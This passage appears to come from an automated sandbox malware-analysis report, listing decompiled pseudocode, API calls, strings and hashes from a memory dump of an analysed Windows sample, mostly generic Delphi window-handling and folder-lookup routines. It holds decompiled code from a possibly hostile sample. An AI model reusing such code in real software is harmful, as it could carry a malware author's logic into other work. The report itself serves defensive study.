                                                    				}
                                                    			}
                                                    0x0043f11e
                                                    0x0043f120
                                                    0x0043f122
                                                    0x0043f124
                                                    0x0043f129
                                                    0x0043f148
                                                    0x0043f14b
                                                    0x0043f228
                                                    0x0043f22f
                                                    0x0043f27a
                                                    0x0043f27a
                                                    0x0043f27a
                                                    0x0043f26b
                                                    0x0043f26f
                                                    0x00000000
                                                    0x0043f26f
                                                    0x0043f159
                                                    0x0043f1f2
                                                    0x0043f1f9
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1ff
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f203
                                                    0x0043f20a
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f20f
                                                    0x0043f213
                                                    0x0043f216
                                                    0x0043f219
                                                    0x0043f21e
                                                    0x0043f21f
                                                    0x00000000
                                                    0x0043f21f
                                                    0x00000000
                                                    0x0043f15f
                                                    0x0043f12b
                                                    0x0043f1a1
                                                    0x0043f1aa
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1b9
                                                    0x0043f1c8
                                                    0x0043f1d5
                                                    0x0043f1dc
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f1e2
                                                    0x00000000
                                                    0x0043f1e2
                                                    0x0043f12d
                                                    0x0043f130
                                                    0x0043f16b
                                                    0x0043f16f
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f17b
                                                    0x0043f183
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f189
                                                    0x0043f132
                                                    0x0043f133
                                                    0x0043f192
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f135
                                                    0x0043f138
                                                    0x0043f235
                                                    0x0043f243
                                                    0x0043f24e
                                                    0x0043f256
                                                    0x0043f261
                                                    0x0043f266
                                                    0x0043f266
                                                    0x0043f256
                                                    0x0043f243
                                                    0x0043f138

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Capture
                                                    • String ID:
                                                    • API String ID: 1145282425-3916222277
                                                    • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                    • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                    • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 37%
                                                    			E004598AC(intOrPtr _a4) {
                                                    				intOrPtr _t26;
                                                    
                                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                    				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                    				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                    				_push(_t26); // executed
                                                    				L00407540(); // executed
                                                    				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                    				return _t26;
                                                    			}
                                                    0x004598b8
                                                    0x004598c2
                                                    0x004598cb
                                                    0x004598d2
                                                    0x004598d5
                                                    0x004598d6
                                                    0x004598e1
                                                    0x004598e5

                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004598D6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction ID: 5377867823ed044e1de45f701f66450d20e8ba5618c1584b6e86b1986842862f
                                                    • Opcode Fuzzy Hash: 750cd2fd3d80466ec9001b3ae24337b2288ee7c66e095b4f83ee67adb3090f09
                                                    • Instruction Fuzzy Hash: E6F0C579605608AFCB40DF9DC588D8AFBE8BB4C264B159195B988CB721D234FD808F90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 42%
                                                    			E004593B4(void* __eax, void* __ebx, void* __ecx) {
                                                    				struct _WNDCLASSA _v44;
                                                    				char _v48;
                                                    				char* _t22;
                                                    				long _t23;
                                                    				CHAR* _t26;
                                                    				struct HINSTANCE__* _t27;
                                                    				intOrPtr* _t29;
                                                    				signed int _t32;
                                                    				intOrPtr* _t33;
                                                    				signed int _t36;
                                                    				struct HINSTANCE__* _t37;
                                                    				void* _t39;
                                                    				CHAR* _t40;
                                                    				struct HWND__* _t41;
                                                    				char* _t47;
                                                    				char* _t52;
                                                    				long _t55;
                                                    				long _t59;
                                                    				struct HINSTANCE__* _t62;
                                                    				intOrPtr _t64;
                                                    				void* _t69;
                                                    				struct HMENU__* _t70;
                                                    				intOrPtr _t77;
                                                    				void* _t83;
                                                    				short _t88;
                                                    
                                                    				_v48 = 0;
                                                    				_t69 = __eax;
                                                    				_push(_t83);
                                                    				_push(0x459555);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t83 + 0xffffffd4;
                                                    				if( *((char*)(__eax + 0xa4)) != 0) {
                                                    					L13:
                                                    					_pop(_t77);
                                                    					 *[fs:eax] = _t77;
                                                    					_push(0x45955c);
                                                    					return E004049C0( &_v48);
                                                    				}
                                                    				_t22 =  *0x49dc84; // 0x49e04c
                                                    				if( *_t22 != 0) {
                                                    					goto L13;
                                                    				}
                                                    				_t23 = E00422BCC(E00459934, __eax); // executed
                                                    				 *(_t69 + 0x40) = _t23;
                                                    				 *0x49bf54 = L00407540;
                                                    				_t26 =  *0x49bf74; // 0x45909c
                                                    				_t27 =  *0x49e668; // 0x400000
                                                    				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                                    					_t62 =  *0x49e668; // 0x400000
                                                    					 *0x49bf60 = _t62;
                                                    					_t88 = RegisterClassA(0x49bf50);
                                                    					if(_t88 == 0) {
                                                    						_t64 =  *0x49d7fc; // 0x422f20
                                                    						E00406A70(_t64,  &_v48);
                                                    						E0040D144(_v48, 1);
                                                    						E00404378();
                                                    					}
                                                    				}
                                                    				_t29 =  *0x49d970; // 0x49e900
                                                    				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
                                                    				if(_t88 < 0) {
                                                    					asm("adc eax, 0x0");
                                                    				}
                                                    				_t33 =  *0x49d970; // 0x49e900
                                                    				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                                    				if(_t88 < 0) {
                                                    					asm("adc eax, 0x0");
                                                    				}
                                                    				_push(_t36);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_t37 =  *0x49e668; // 0x400000
                                                    				_push(_t37);
                                                    				_push(0);
                                                    				_t7 = _t69 + 0x8c; // 0x96000045
                                                    				_t39 = E00404E80( *_t7);
                                                    				_t40 =  *0x49bf74; // 0x45909c, executed
                                                    				_t41 = E00407AE4(_t40, _t39); // executed
                                                    				 *(_t69 + 0x30) = _t41;
                                                    				_t9 = _t69 + 0x8c; // 0x45150c
                                                    				E004049C0(_t9);
                                                    				 *((char*)(_t69 + 0xa4)) = 1;
                                                    				_t11 = _t69 + 0x40; // 0x10940000
                                                    				_t12 = _t69 + 0x30; // 0xe
                                                    				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                    				_t47 =  *0x49da40; // 0x49eb1c
                                                    				if( *_t47 != 0) {
                                                    					_t55 = E0045A038(_t69);
                                                    					_t13 = _t69 + 0x30; // 0xe
                                                    					SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                                    					_t59 = E0045A038(_t69);
                                                    					_t14 = _t69 + 0x30; // 0xe
                                                    					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
                                                    				}
                                                    				_t15 = _t69 + 0x30; // 0xe
                                                    				_t70 = GetSystemMenu( *_t15, "true");
                                                    				DeleteMenu(_t70, 0xf030, 0);
                                                    				DeleteMenu(_t70, 0xf000, 0);
                                                    				_t52 =  *0x49da40; // 0x49eb1c
                                                    				if( *_t52 != 0) {
                                                    					DeleteMenu(_t70, 0xf010, 0);
                                                    				}
                                                    				goto L13;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00422BCC: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    • GetClassInfoA.USER32 ref: 00459413
                                                    • RegisterClassA.USER32 ref: 0045942B
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 004594C7
                                                    • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004594E9
                                                    • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00451480), ref: 004594FC
                                                    • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459507
                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459516
                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 00459523
                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00451480), ref: 0045953A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                    • String ID: /B$@u@$LI
                                                    • API String ID: 2103932818-2136969242
                                                    • Opcode ID: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction ID: fa4c447954f7109e74da3f6b40bcdb174dc852a7bebec26a65c914fdd247333a
                                                    • Opcode Fuzzy Hash: eae146cbbc034aa1e1cb718f7a14a071a7d93044c5fe7bbaf966ce47750368c8
                                                    • Instruction Fuzzy Hash: 594163B1A44204AFE711EF79DD82F663798AB55704F504576FD00EB2E3DA78AC048B6C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 86%
                                                    			E00446330(void* __ebx, void* __edi, void* __eflags) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				long _v28;
                                                    				char _v32;
                                                    				char _v36;
                                                    				intOrPtr _t25;
                                                    				short _t27;
                                                    				char _t29;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t47;
                                                    				intOrPtr _t49;
                                                    				intOrPtr* _t50;
                                                    				intOrPtr _t53;
                                                    				struct HINSTANCE__* _t63;
                                                    				intOrPtr* _t78;
                                                    				intOrPtr* _t80;
                                                    				intOrPtr _t83;
                                                    				void* _t87;
                                                    
                                                    				_v20 = 0;
                                                    				_v8 = 0;
                                                    				_push(_t87);
                                                    				_push(0x4464a8);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t87 + 0xffffffe0;
                                                    				_v16 = GetCurrentProcessId();
                                                    				_v12 = 0;
                                                    				E0040A664("Delphi%.8X", 0,  &_v16,  &_v8);
                                                    				E00404A14(0x49eb28, _v8);
                                                    				_t25 =  *0x49eb28; // 0x0
                                                    				_t27 = GlobalAddAtomA(E00404E80(_t25)); // executed
                                                    				 *0x49eb24 = _t27;
                                                    				_t29 =  *0x49e668; // 0x400000
                                                    				_v36 = _t29;
                                                    				_v32 = 0;
                                                    				_v28 = GetCurrentThreadId();
                                                    				_v24 = 0;
                                                    				E0040A664("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                    				E00404A14(0x49eb2c, _v20);
                                                    				_t35 =  *0x49eb2c; // 0x0
                                                    				 *0x49eb26 = GlobalAddAtomA(E00404E80(_t35));
                                                    				_t38 =  *0x49eb2c; // 0x0
                                                    				 *0x49eb30 = RegisterClipboardFormatA(E00404E80(_t38));
                                                    				 *0x49eb68 = E0041AF14(1);
                                                    				E00445F34();
                                                    				 *0x49eb18 = E00445D5C(1, 1);
                                                    				_t47 = E00457FC8(1, __edi);
                                                    				_t78 =  *0x49de0c; // 0x49ebbc
                                                    				 *_t78 = _t47;
                                                    				_t49 = E004590AC(0, 1);
                                                    				_t80 =  *0x49dbcc; // 0x49ebb8
                                                    				 *_t80 = _t49;
                                                    				_t50 =  *0x49dbcc; // 0x49ebb8
                                                    				E0045AD24( *_t50, 1);
                                                    				_t53 =  *0x435da8; // 0x435dac
                                                    				E0041A634(_t53, 0x43807c, 0x43808c);
                                                    				_t63 = GetModuleHandleA("USER32");
                                                    				if(_t63 != 0) {
                                                    					 *0x49bc1c = GetProcAddress(_t63, "AnimateWindow");
                                                    				}
                                                    				_pop(_t83);
                                                    				 *[fs:eax] = _t83;
                                                    				_push(0x4464af);
                                                    				E004049C0( &_v20);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                    • GlobalAddAtomA.KERNEL32 ref: 00446384
                                                    • GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                    • GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                    • RegisterClipboardFormatA.USER32 ref: 004463EB
                                                      • Part of subcall function 0041AF14: RtlInitializeCriticalSection.KERNEL32(00418638,?,?,00422E79,00000000,00422E9D), ref: 0041AF33
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                      • Part of subcall function 00445F34: GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                      • Part of subcall function 00445F34: LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                      • Part of subcall function 00445F34: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                      • Part of subcall function 00445F34: SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                      • Part of subcall function 00457FC8: GetKeyboardLayout.USER32 ref: 0045800D
                                                      • Part of subcall function 00457FC8: 733AAC50.USER32(00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                      • Part of subcall function 00457FC8: 733AAD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                      • Part of subcall function 00457FC8: 733AB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?), ref: 00458077
                                                      • Part of subcall function 004590AC: LoadIconA.USER32 ref: 00459191
                                                      • Part of subcall function 004590AC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                      • Part of subcall function 004590AC: OemToCharA.USER32 ref: 004591D6
                                                      • Part of subcall function 004590AC: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00446440,00000000,00000000,?,00000000), ref: 00459216
                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32$h}C
                                                    • API String ID: 2159221912-974380857
                                                    • Opcode ID: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction ID: 9417c5a7fe2a4a4aad457f7fc52310e9237dc336e75d7247441188c808a0813e
                                                    • Opcode Fuzzy Hash: 1bc722d84db1e791bc8fcbe28cc3a7bbf3fa10e53254183cf11b5c8455d3b831
                                                    • Instruction Fuzzy Hash: 5E4103B09042049BDB00EFB6EC45A5E77B5AF59308B11853BF505E73A2DB39B904CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 54%
                                                    			E004730FC(signed int __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
                                                    				struct _ITEMIDLIST* _v8;
                                                    				char _v12;
                                                    				char _v273;
                                                    				char _v280;
                                                    				char _v296;
                                                    				char _v300;
                                                    				char _v304;
                                                    				char _v308;
                                                    				signed int _t29;
                                                    				int _t59;
                                                    				int _t63;
                                                    				intOrPtr* _t81;
                                                    				signed int _t84;
                                                    				int _t91;
                                                    				intOrPtr _t93;
                                                    				intOrPtr _t100;
                                                    				intOrPtr* _t108;
                                                    				void* _t110;
                                                    				void* _t111;
                                                    				intOrPtr _t112;
                                                    
                                                    				_t91 = __edx;
                                                    				_t29 = __eax;
                                                    				_t110 = _t111;
                                                    				_t112 = _t111 + 0xfffffed0;
                                                    				_v308 = 0;
                                                    				_v304 = 0;
                                                    				_v300 = 0;
                                                    				_v280 = 0;
                                                    				_t81 = __edx;
                                                    				_push(_t110);
                                                    				_push(0x473306);
                                                    				_push( *[fs:ecx]);
                                                    				 *[fs:ecx] = _t112;
                                                    				_t84 = __eax;
                                                    				if(__eax > 6) {
                                                    					L8:
                                                    					if(_t29 != 7) {
                                                    						SHGetSpecialFolderLocation(0, _t91,  &_v8); // executed
                                                    						SHGetPathFromIDList(_v8,  &_v273);
                                                    						E0040A174( &_v273, _t81);
                                                    					} else {
                                                    						_push(_t110);
                                                    						_push(0x4732a8);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t112;
                                                    						E00472EF0( &_v280, _t81, _t84, 0);
                                                    						E00404DCC(_v280, 0x47331c);
                                                    						if(0 == 0) {
                                                    							SHGetSpecialFolderLocation(0, 5,  &_v8);
                                                    							SHGetPathFromIDList(_v8,  &_v273);
                                                    							E0040A174( &_v273,  &_v300);
                                                    							E00409D30(_v300, _t81);
                                                    							E00404CCC( &_v304, "\\Downloads",  *_t81);
                                                    							_t59 = E00409A58(_v304);
                                                    							__eflags = _t59;
                                                    							if(_t59 == 0) {
                                                    								E00404CCC( &_v308, 0x473390,  *_t81);
                                                    								_t63 = E00409A58(_v308);
                                                    								__eflags = _t63;
                                                    								if(_t63 == 0) {
                                                    									E004049C0(_t81);
                                                    								} else {
                                                    									E00404C88(_t81, 0x473390);
                                                    								}
                                                    							} else {
                                                    								E00404C88(_t81, "\\Downloads");
                                                    							}
                                                    						} else {
                                                    							_t108 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHGetKnownFolderPath");
                                                    							E00408CA8("{374DE290-123F-4565-9164-39C4925E467B}", _t81,  &_v296, _t108, 0);
                                                    							 *_t108( &_v296, 0, 0,  &_v12);
                                                    							E00404BE8(_t81, _v12);
                                                    						}
                                                    						_pop(_t100);
                                                    						 *[fs:eax] = _t100;
                                                    					}
                                                    					_pop(_t93);
                                                    					 *[fs:eax] = _t93;
                                                    					_push(0x47330d);
                                                    					E004049E4( &_v308, 3);
                                                    					return E004049C0( &_v280);
                                                    				}
                                                    				switch( *((intOrPtr*)(__eax * 4 +  &M00473140))) {
                                                    					case 0:
                                                    						goto L8;
                                                    					case 1:
                                                    						_t91 = 0x1a;
                                                    						goto L8;
                                                    					case 2:
                                                    						__edx = 0x1c;
                                                    						goto L8;
                                                    					case 3:
                                                    						__edx = 0x23;
                                                    						goto L8;
                                                    					case 4:
                                                    						__edx = 0x2e;
                                                    						goto L8;
                                                    					case 5:
                                                    						__edx = 5;
                                                    						goto L8;
                                                    					case 6:
                                                    						__edx = 0;
                                                    						__eflags = 0;
                                                    						goto L8;
                                                    				}
			}

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(shell32.dll,00000000,004732A8,?,00000000,00473306), ref: 004731BA
                                                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 004731C7
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00473206
                                                    • SHGetPathFromIDList.SHELL32(?,?), ref: 00473216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFolderFromLibraryListLoadLocationPathProcSpecial
                                                    • String ID: SHGetKnownFolderPath$\Downloads$shell32.dll${374DE290-123F-4565-9164-39C4925E467B}
                                                    • API String ID: 2341558874-1676591009
                                                    • Opcode ID: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction ID: 6a38066a99e998b0feb9dfcd70d0f28be743192f9ebabe66a089855190f33de3
                                                    • Opcode Fuzzy Hash: ceb5cd3c2f7c68d7676a2a85ae2993d6271a5020a26987a0caa0ce5203d03466
                                                    • Instruction Fuzzy Hash: 9741C970B04118ABD720EF65DC42BDE73B9EB48705F5084BBB90CA7681DA3C9F419A1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 84%
                                                    			E0043E6BC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                    				char _v68;
                                                    				struct _WNDCLASSA _v108;
                                                    				intOrPtr _v116;
                                                    				signed char _v137;
                                                    				void* _v144;
                                                    				struct _WNDCLASSA _v184;
                                                    				char _v188;
                                                    				char _v192;
                                                    				char _v196;
                                                    				int _t52;
                                                    				void* _t53;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t104;
                                                    				intOrPtr _t108;
                                                    				void* _t109;
                                                    				intOrPtr* _t111;
                                                    				void* _t115;
                                                    
                                                    				_t109 = __edi;
                                                    				_t94 = __ebx;
                                                    				_push(__ebx);
                                                    				_v196 = 0;
                                                    				_t111 = __eax;
                                                    				_push(_t115);
                                                    				_push(0x43e87d);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t115 + 0xffffff40;
                                                    				_t95 =  *__eax;
                                                    				 *((intOrPtr*)( *__eax + 0x98))();
                                                    				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                    					L7:
                                                    					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                                    					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                    					asm("sbb eax, eax");
                                                    					_t53 = _t52 + 1;
                                                    					if(_t53 == 0 || E00437D70 != _v184.lpfnWndProc) {
                                                    						if(_t53 != 0) {
                                                    							UnregisterClassA( &_v68, _v108.hInstance);
                                                    						}
                                                    						_v108.lpfnWndProc = E00437D70;
                                                    						_v108.lpszClassName =  &_v68;
                                                    						if(RegisterClassA( &_v108) == 0) {
                                                    							E0040E79C(_t94, _t95, _t109, _t111);
                                                    						}
                                                    					}
                                                    					 *0x49bc20 = _t111;
                                                    					_t96 =  *_t111; // executed
                                                    					 *((intOrPtr*)( *_t111 + 0x9c))();
                                                    					if( *(_t111 + 0x180) == 0) {
                                                    						E0040E79C(_t94, _t96, _t109, _t111);
                                                    					}
                                                    					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                                    						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                                    					}
                                                    					E0040A1D4( *((intOrPtr*)(_t111 + 0x64)));
                                                    					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                                    					E00441A14(_t111);
                                                    					E0043C130(_t111, E00424E24( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1); // executed
                                                    					_t130 =  *((char*)(_t111 + 0x5c));
                                                    					if( *((char*)(_t111 + 0x5c)) != 0) {
                                                    						E00403DE8(_t111, _t130);
                                                    					}
                                                    					_pop(_t104);
                                                    					 *[fs:eax] = _t104;
                                                    					_push(0x43e884);
                                                    					return E004049C0( &_v196);
                                                    				} else {
                                                    					_t94 =  *((intOrPtr*)(__eax + 4));
                                                    					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                                    						L6:
                                                    						_v192 =  *((intOrPtr*)(_t111 + 8));
                                                    						_v188 = 0xb;
                                                    						_t86 =  *0x49dc4c; // 0x422f30
                                                    						E00406A70(_t86,  &_v196);
                                                    						_t95 = _v196;
                                                    						E0040D180(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                                    						E00404378();
                                                    					} else {
                                                    						_t108 =  *0x437498; // 0x4374e4
                                                    						if(E00403D78(_t94, _t108) == 0) {
                                                    							goto L6;
                                                    						}
                                                    						_v116 = E00441704(_t94);
                                                    					}
                                                    					goto L7;
                                                    				}
			}

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 0043E780
                                                    • UnregisterClassA.USER32 ref: 0043E7A8
                                                    • RegisterClassA.USER32 ref: 0043E7BE
                                                    • GetWindowLongA.USER32 ref: 0043E7FA
                                                    • GetWindowLongA.USER32 ref: 0043E80F
                                                    • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043E822
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
